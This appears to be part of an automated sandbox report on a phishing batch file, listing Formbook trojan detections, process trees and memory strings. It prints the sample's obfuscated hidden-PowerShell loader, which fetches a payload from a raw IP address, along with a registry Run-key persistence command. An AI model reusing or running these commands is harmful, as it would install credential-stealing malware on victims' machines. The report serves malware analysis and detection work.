              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD3469A7163_2_00007FFD3469A716
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0466E9286_2_0466E928
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0466F1F86_2_0466F1F8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0466E5E06_2_0466E5E0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_073C9AF06_2_073C9AF0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_21CC719411_2_21CC7194
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_21CBB5C111_2_21CBB5C1
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0044B04016_2_0044B040
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0043610D16_2_0043610D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0044731016_2_00447310
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0044A49016_2_0044A490
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0040755A16_2_0040755A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0043C56016_2_0043C560
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0044B61016_2_0044B610
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0044D6C016_2_0044D6C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_004476F016_2_004476F0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0044B87016_2_0044B870
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0044081D16_2_0044081D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0041495716_2_00414957
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_004079EE16_2_004079EE
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_00407AEB16_2_00407AEB
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0044AA8016_2_0044AA80
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_00412AA916_2_00412AA9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_00404B7416_2_00404B74
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_00404B0316_2_00404B03
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0044BBD816_2_0044BBD8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_00404BE516_2_00404BE5
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_00404C7616_2_00404C76
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_00415CFE16_2_00415CFE
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_00416D7216_2_00416D72
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_00446D3016_2_00446D30
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_00446D8B16_2_00446D8B
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_00406E8F16_2_00406E8F
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_0040503817_2_00405038
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_0041208C17_2_0041208C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_004050A917_2_004050A9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_0040511A17_2_0040511A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_0043C13A17_2_0043C13A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_004051AB17_2_004051AB
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_0044930017_2_00449300
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_0040D32217_2_0040D322
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_0044A4F017_2_0044A4F0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_0043A5AB17_2_0043A5AB
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_0041363117_2_00413631
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_0044669017_2_00446690
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_0044A73017_2_0044A730
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_004398D817_2_004398D8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_004498E017_2_004498E0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_0044A88617_2_0044A886
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_0043DA0917_2_0043DA09
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_00438D5E17_2_00438D5E
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_00449ED017_2_00449ED0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_0041FE8317_2_0041FE83
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_00430F5417_2_00430F54
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_004050C218_2_004050C2
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_004014AB18_2_004014AB
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_0040513318_2_00405133
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_004051A418_2_004051A4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_0040124618_2_00401246
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_0040CA4618_2_0040CA46
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_0040523518_2_00405235
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_004032C818_2_004032C8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_0040168918_2_00401689
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_00402F6018_2_00402F60
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_0329F2A820_2_0329F2A8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_0329FB7820_2_0329FB78
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_0329EF6020_2_0329EF60
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_3_06C37BD327_3_06C37BD3
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A052A027_2_22A052A0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AA12ED27_2_22AA12ED
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A1B2C027_2_22A1B2C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AA027427_2_22AA0274
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A4739A27_2_22A4739A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AC03E627_2_22AC03E6
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A0E3F027_2_22A0E3F0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AB132D27_2_22AB132D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229ED34C27_2_229ED34C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22ABA35227_2_22ABA352
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AB70E927_2_22AB70E9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22ABF0E027_2_22ABF0E0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A070C027_2_22A070C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AAF0CC27_2_22AAF0CC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AC01AA27_2_22AC01AA
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A0B1B027_2_22A0B1B0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AB81CC27_2_22AB81CC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229F010027_2_229F0100
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A9A11827_2_22A9A118
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22ACB16B27_2_22ACB16B
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A3516C27_2_22A3516C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229EF17227_2_229EF172
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A8815827_2_22A88158
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A1C6E027_2_22A1C6E0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AB16CC27_2_22AB16CC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22ABF7B027_2_22ABF7B0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229FC7C027_2_229FC7C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A0077027_2_22A00770
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A2475027_2_22A24750
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AAE4F627_2_22AAE4F6
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22ABF43F27_2_22ABF43F
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AB244627_2_22AB2446
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229F146027_2_229F1460
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A9D5B027_2_22A9D5B0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AC059127_2_22AC0591
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 229EB970 appears 102 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 004169A7 appears 87 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 22A7F290 appears 43 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 0044DB70 appears 41 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 004165FF appears 35 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00422297 appears 42 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 22A47E54 appears 39 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00444B5A appears 37 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 22A6EA12 appears 51 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00413025 appears 79 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00416760 appears 69 times
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Argumentlistens" /t REG_EXPAND_SZ /d "%Semicomic% -w 1 $Affektationernes=(Get-ItemProperty -Path 'HKCU:\Agenetic76\').Tautologiske178;%Semicomic% ($Affektationernes)"
              Source: amsi32_4972.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: amsi32_6420.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: 0000001E.00000002.3417567901.0000000000EF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0000001B.00000002.3098127241.0000000003000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0000001D.00000002.3408938742.0000000000B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0000001B.00000002.3137363083.0000000022D10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0000001D.00000002.3417419300.0000000004A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0000001D.00000002.3416540680.0000000003100000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0000001C.00000002.3417935091.00000000026F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: Process Memory Space: powershell.exe PID: 2084, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 4972, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 504, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engineClassification label: mal100.phis.troj.spyw.expl.evad.winBAT@47/20@7/6
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z,16_2_004182CE
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,FindCloseChangeNotification,18_2_00410DE1
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,??3@YAXPAX@Z,16_2_00418758
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,??3@YAXPAX@Z,Process32NextW,CloseHandle,16_2_00413D4C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,16_2_0040B58D
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Indisposedness.AssJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1936:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4492:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2580:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6552:120:WilError_03
              Source: C:\Program Files (x86)\Windows Mail\wab.exeMutant created: \Sessions\1\BaseNamedObjects\klpcourg-793VPF
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mzpsuj1k.q1u.ps1Jump to behavior
              Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\MATALJ Kft Rendel#U00e9s H634667478874873845985309802Thayne.bat" "
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IMG-466573885783553Folketingsmedlemmers.vbs"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem information queried: HandleInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=2084
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=4972
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=504
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6420
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
              Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
              Source: wab.exe, wab.exe, 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
              Source: wab.exe, wab.exe, 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
              Source: wab.exe, 0000000B.00000002.3437548482.00000000225D0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
              Source: wab.exe, wab.exe, 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
              Source: wab.exe, wab.exe, 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
              Source: wab.exe, wab.exe, 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
              Source: wab.exe, 00000010.00000002.2561698377.00000000041C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: wab.exe, wab.exe, 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
              Source: MATALJ Kft Rendel#U00e9s H634667478874873845985309802Thayne.batVirustotal: Detection: 14%
              Source: MATALJ Kft Rendel#U00e9s H634667478874873845985309802Thayne.batReversingLabs: Detection: 13%
              Source: C:\Program Files (x86)\Windows Mail\wab.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_17-33261
              Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\MATALJ Kft Rendel#U00e9s H634667478874873845985309802Thayne.bat" "
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Antigyrous='S';$Antigyrous+='ubs';$Antigyrous+='tri';$Disseizure = 1;$Antigyrous+='ng';Function Sortkridtstegningens($Udlossende){$Makah=$Udlossende.Length-$Disseizure;For($Vaesentligheden206=5;$Vaesentligheden206 -lt $Makah;$Vaesentligheden206+=6){$Vrdiomraades+=$Udlossende.$Antigyrous.Invoke( $Vaesentligheden206, $Disseizure);}$Vrdiomraades;}function Caprellidae($Kondenseret){ & ($Fligene) ($Kondenseret);}$festdragtens=Sortkridtstegningens ' S.ovMFo,kloBeathzBelavi overlFaciolVictraMictu/Kphje5Krlha.Osteo0 Prin Sove( TiltWLnfreiNa.osnTeg sdWatero,etatwVaskosRegis TrouNswigsTinges Retsa1Intel0 Aspe. Anal0 C oc;P.aya disshWDoliciLa gbnF,ktu6Trska4 g.nz;an ui OmkamxH tto6Forha4 Fine;Hvidg Ring rFlaskvBakka: Uden1Pyroc2 Unmo1Anili.Stil.0 T,ks) dy.t AendrG GuldeWavescIc,erkAdonio El.f/ Scri2Kaily0Signa1Beb,u0Apnea0Ne,tu1Headw0Tre s1Freml TreadFRecoiiJargorApnoeeSnorkfWhiffoLeysex Bioe/Aspar1Fetic2Pseu.1Udstt. Tope0Snic, ';$Lrredskjolernes=Sortkridtstegningens ' ScleUSpn.msRepedeEne gr Mell-UndreAFluidgFors.eAndennsupert Brav ';$hypermnesia=Sortkridtstegningens 'SemiahSlangtLoosstLage.p Pnhe:Xwfin/Dummk/Polym1 C,pt9Thges4Elect.inval5Repet9 Eksa. Mugg3ligro0 Thom.Bevge6Gulli/M.nkeU SagrnTr lacInk,tobeanfmAarsaiSandscLaiba.LandgmBombedFingepForly ';$Aktiveret=Sortkridtstegningens 'Freqe>fredn ';$Fligene=Sortkridtstegningens ' Molyi ForheTopsax pers ';$Opvarmningsmssige='Mongolisms';$Haandvrksbagere = Sortkridtstegningens 'MediceFibe c Escah SmleoDomin Paste% Unp.a DemepChelipDecardSubfla UnactSu.liaUndon%,rmme\TekstI SelvnIndigd droniUdsvisTyknipBraknoOnestsRenteeSkibsdDeempnKog.ieGennesDyingsTh mu. A,svAempris Rings Emu, Peng&Skyfo&Pusli SteereaflvncTh.nahSkeleoSideo Alb.mtAftvt ';Caprellidae (Sortkridtstegningens 'sekst$LagergDecimlSpectoAsem bEftera,usiolFlam :WorthRDoms,uKnle ia solnPleathCiviloSnedkbKaroleTyndsnGrasssConch= arve(BloodcRaidemSydyedStrkk Pik p/fjortcPerco Appre$Dial,HKuardaA.olia Lv,an.hyrod,igtov JoshrObtaik Fjersfi.msbSt rtaConsugBe eveGryderUngdoemixyp)Umb.l ');Caprellidae (Sortkridtstegningens 'Opmun$SpildgStilllScienoSpilob nkomaVent lHksun:NondiGResoryHellirGglero HonosOu,pucsvkk oCommep Berei smudc ,ini=Pyr o$Sy,tahUnprayPluc p,uraceSynedrBerigmAe opneryt eAngolsBothiiSkefua Domf.E.gotsBede.pSjofelS.ndiijo.rnthydro(Prokl$ AfleAAmts.kBlomstErodeiAtonav toreNonscr atsaeFor ktCon e)Oscil ');$hypermnesia=$Gyroscopic[0];$Charcia= (Sortkridtstegningens ' Most$Mislig WhirlS,geeoHaandb,olicaZ.omelBoard:M elfSCard.kUdarmiR.ssof FugetImpreeUnanntSinca1 B ll4Noedv=V rboNUndereprojiwSyste-PumpeOBaro.bKlassjHumaneForurcNoncrtEl ct SangvS Vriky DistsTh.wlt,ndsteFilodmkvali.,oderN Exhae Sk,btpleur.O,erpWUn.enePaaklbinverCEndomlamblyiDrillegellynUvet,t');$Charcia+=$Ruinhobens[1];Caprellidae ($Charcia);Caprellidae (Sortkridtstegningens ' S,ri$Ansa.STarikkB.njoiSk rpfRealitKartveVariet Dove1Puggi4Nonve. Ph lHSag,regenteaC erudNdlideSt.n
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Indisposedness.Ass && echo t"
